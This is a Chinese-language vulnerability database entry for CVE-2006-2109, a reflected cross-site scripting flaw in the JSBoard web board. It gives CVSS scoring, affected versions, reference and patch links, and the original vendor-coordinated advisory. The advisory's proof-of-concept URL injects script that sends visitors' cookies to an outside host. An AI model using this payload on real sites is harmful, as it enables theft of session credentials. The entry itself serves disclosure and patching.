CVE-2006-2109
CVSS6.8
发布时间 :2006-05-02 06:02:00
修订时间 :2011-03-07 21:35:16
NMCOPS    

[原文]Cross-site scripting (XSS) vulnerability in the parse_query_str function in include/print.php in JSBoard 2.0.10 and 2.0.11, and possibly other versions before 2.0.12, allows remote attackers to inject arbitrary web script or HTML via parameters that are set as global variables within the program, as demonstrated using the table parameter to login.php.


[CNNVD]JSBoard include/print.php 跨站脚本攻击漏洞(CNNVD-200605-032)

        JSBoard 的include/print.php中的parse_query_str函数存在跨站脚本攻击(XSS)漏洞。远程攻击者可以借助在程序内设为全局变量的参数,注入任意Web脚本或HTML,比如使用对login.php的table参数。

- CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:jsboard:jsboard:2.0.11
cpe:/a:jsboard:jsboard:2.0.8
cpe:/a:jsboard:jsboard:2.0.7
cpe:/a:jsboard:jsboard:2.0.9
cpe:/a:jsboard:jsboard:2.0.10

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2109
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2109
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-032
(官方数据源) CNNVD

- 其它链接及资源

https://www.klink.name/security/aklink-sa-2006-001-jsboard-xss.txt
(VENDOR_ADVISORY)  MISC  https://www.klink.name/security/aklink-sa-2006-001-jsboard-xss.txt
http://www.vupen.com/english/advisories/2006/1636
(UNKNOWN)  VUPEN  ADV-2006-1636
http://xforce.iss.net/xforce/xfdb/26211
(UNKNOWN)  XF  jsboard-login-xss(26211)
http://www.securityfocus.com/bid/17778
(UNKNOWN)  BID  17778
http://www.securityfocus.com/archive/1/archive/1/432714/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060502 JSBoard XSS vulnerability
http://www.osvdb.org/25222
(UNKNOWN)  OSVDB  25222
http://secunia.com/advisories/19937
(UNKNOWN)  SECUNIA  19937

- 漏洞信息

JSBoard include/print.php 跨站脚本攻击漏洞
中危 跨站脚本
2006-05-02 00:00:00 2006-05-02 00:00:00
远程  
        JSBoard 的include/print.php中的parse_query_str函数存在跨站脚本攻击(XSS)漏洞。远程攻击者可以借助在程序内设为全局变量的参数,注入任意Web脚本或HTML,比如使用对login.php的table参数。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        JSBoard JSBoard 2.0.10
        JSBoard jsboard-2.0.12.tar.gz
        http://kldp.net/frs/download.php/3344/jsboard-2.0.12.tar.gz
        JSBoard JSBoard 2.0.11
        JSBoard jsboard-2.0.12.tar.gz
        http://kldp.net/frs/download.php/3344/jsboard-2.0.12.tar.gz

- 漏洞信息 (F46046)

aklink-sa-2006-001-jsboard-xss.txt (PacketStormID:F46046)
2006-05-05 00:00:00
Alexander Klink  
exploit,xss
CVE-2006-2109
[点击下载]

JSBoard releases 2.0.10 and 2.0.11 suffer from a cross site scripting vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

============================================
||| Security Advisory AKLINK-SA-2006-001 |||
||| CAN-2006-2109 (CVE candidate)        |||
============================================

JSBoard - Cross Site Scripting Attack
=====================================

Date released: 02.05.2006
Date reported: 30.04.2006
$Revision: 1.1 $

by Alexander Klink
   alexander@klink.name
   https://www.klink.name/security/aklink-sa-2006-001-jsboard-xss.txt
   (TLS certificate information: https://www.klink.name/tls.txt)
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2006-2109

Vendor: JoungKyun Kim (Open Source)
Product: JSBoard - a news and discussion web board popular in Korea
Website: http://jsboard.kldp.org
Vulnerability: Non-persistent XSS attack
Class: remote
Status: patched
Severity: low (possible disclosure of session and other cookies)
Releases known to be affected: 2.0.11, 2.0.10
Releases known NOT to be affected: 2.0.12

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

A non-persistent XSS attack can be carried out using variables that
are supposed to be from included files but can be overwritten using
variables defined in the CGI query.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

In the function parse_query_str() in include/print.php every variable
from the CGI request is set as a global variable, regardless of prior
use. As parse_query_str() is typically called after the inclusion of
other files that define variables which are not changed but output
in the rest of the program, this allows an attacker to inject XSS
code, for example Javascript.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Proof of concept:

http://[target]/jsboard/login.php?table=<script>document.location='http://www.cgi-security.com/cgi-bin/cookie.cgi'%2Bdocument.cookie</script>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Workaround:

None known.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Communication:

* 30.04.2006: Problem reported to author
* 30.04.2006: Author replies and releases patched version 2.0.12

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

Install JSBoard 2.0.12, which fixes this particular attack vector.
Note that CGI query variables are still imported into the global
namespace, which means a similar problem might appear in a later version.
The patch is available from:
http://kldp.net/frs/download.php/3346/2.0.11-2.0.12.patch.tar.gz

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credit:

Alexander Klink (discovery)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFEVs008Q3kKmNSxUURAoNLAJ0bnP+eZ2x4O3Nj57cMtLZKam6tqwCffCdv
Z7Jztkr1x7zn/uOaHy+rTSs=
=k/y4
-----END PGP SIGNATURE-----

    

- 漏洞信息

25222
JSBoard login.php table Parameter XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

JSBoard contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'table' variable upon submission to the login.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- 时间线

2006-05-01 Unknow
2006-05-01 Unknow

- 解决方案

Upgrade to version 2.0.12 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

JSBoard Login.PHP Cross-Site Scripting Vulnerability
Input Validation Error 17778
Yes No
2006-05-02 12:00:00 2009-07-12 05:56:00
Alexander Klink is credited with the discovery of this vulnerability.

- 受影响的程序版本

JSBoard JSBoard 2.0.11
JSBoard JSBoard 2.0.10
JSBoard JSBoard 2.0.12

- 不受影响的程序版本

JSBoard JSBoard 2.0.12

- 漏洞讨论

JSBoard is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

- 漏洞利用

This issue can be exploited through a web client.

The following proof-of-concept URI is available:

- 解决方案

The vendor has released version 2.0.12 to address this issue.


JSBoard JSBoard 2.0.10

JSBoard JSBoard 2.0.11

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站